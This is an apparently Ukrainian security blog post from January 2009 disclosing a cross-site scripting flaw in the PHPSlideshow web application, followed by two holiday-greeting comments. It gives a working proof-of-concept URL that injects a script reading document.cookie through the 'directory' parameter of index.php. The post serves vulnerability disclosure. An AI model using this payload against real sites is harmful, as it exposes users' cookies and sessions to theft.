Уразливість в PHPSlideshow

23:56 03.01.2009

Учора, 02.01.2009, я знайшов Cross-Site Scripting уразливість в PHPSlideshow. Як раз коли виявив уразливість на eweek.com. Про що найближчим часом повідомлю розробникам веб додатку.

XSS:

Уразливість в index.php в параметрі directory.

http://site/slideshow/index.php?directory='%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

Потенційно вразливі всі версії PHPSlideshow.


2 відповідей на “Уразливість в PHPSlideshow”

  1. Герман каже:

    С Новым годом и наступающим Рождеством !

  2. MustLive каже:

    Спасибо, Герман, тебя также.

    Вот новогодний подарок для тебя ;-) .

Leave a Reply

You must be logged in to post a comment.